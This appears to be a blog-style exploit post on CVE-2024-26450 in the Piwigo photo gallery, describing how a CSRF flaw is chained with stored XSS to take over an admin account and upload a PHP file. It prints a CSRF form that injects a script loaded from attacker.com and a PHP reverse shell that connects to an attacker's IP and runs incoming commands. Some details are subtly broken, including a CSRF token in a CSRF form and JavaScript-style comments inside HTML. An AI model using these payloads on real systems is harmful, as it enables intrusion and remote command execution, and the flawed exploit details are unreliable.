CVE-2024-26450 - Piwigo Server Exploit: Chaining CSRF and Stored XSS Vulnerabilities to Gain Remote Access

A significant security issue has been discovered within Piwigo, an open-source photo gallery software, versions before v.14.2.. This vulnerability (CVE-2024-26450) allows a malicious user to execute remote JavaScript by chaining a Cross-Site Request Forgery (CSRF) vulnerability and a Stored Cross-Site Scripting (XSS) attack, ultimately taking over the target application.

In this post, we will delve into the details of this exploit, provide sample code, and include references to its origins.

The Vulnerability

The attack begins by compromising the admin user dashboard. The attacker exploits a CSRF vulnerability in Piwigo to issue a Stored XSS payload. This payload is then executed remotely when the admin views their dashboard resulting in the injection of malicious JavaScript. Eventually, the attacker can use this attack vector to create and upload a new PHP file with malicious content.

The following snippet demonstrates the code used in this injection

// Sample payload for the CSRF attack
<form action="target_piwigo_instance.com/admin.php" method="post" enctype="multipart/form-data">
  // CSRF token, which in a real attack would be obtained and submitted by the attacker
  <input type="hidden" name="csrf_token" value="sample_csrf_token" />

  <input type="hidden" name="action" value="add_user" />
  <input type="hidden" name="simple_user" value="Administrator" />
  <input type="hidden" name="username" value="sample_username" />
  <input type="hidden" name="email" value="sample_email@attacker.com" />
  <input type="hidden" name="password" value="sample_password" />

  // Stored XSS payload
  <input type="hidden" name="additional_info" value="<script src='http://attacker.com/malicious_script.js'></script>"; />
  <input type="submit" value="Submit" />
  </form>

Exploiting the Vulnerability

After successfully injecting the malicious JavaScript code through the CSRF and Stored XSS attack, the attacker can now exploit the application to perform unauthorized actions, such as uploading a PHP file containing a reverse shell. This file can subsequently be directly accessed by the attacker, granting unwanted access to the server.

Here's a sample PHP code for a reverse shell

<?php
  $sock = fsockopen("attacker_ip", attacker_port);
  $cmd = '';
  while (($command = fgets($sock, 1024))) {
      $output = shell_exec($command);
      $bytes_written = fwrite($sock, $output);
  }
  fclose($sock);
?>

Mitigations

To protect against this exploit, it is crucial to update Piwigo to a version equal to or above v.14.2.. Additionally, administrators should validate and sanitize user input, enforce strict Content Security Policies (CSP), and use anti-CSRF tokens.

Original References

- Piwigo Official Website
- Piwigo CVE-2024-26450 Official Advisory
- Piwigo on Github

Conclusion

In conclusion, CVE-2024-26450 is a dangerous vulnerability present in Piwigo versions before v.14.2.. By chaining CSRF and Stored XSS attacks, an attacker compromises an administrator's dashboard and can potentially gain remote access to the server. To mitigate this threat, upgrading to a secure version of Piwigo and implementing recommended security measures are necessary.

Timeline

Published on: 02/28/2024 22:15:26 UTC
Last modified on: 03/09/2024 08:15:06 UTC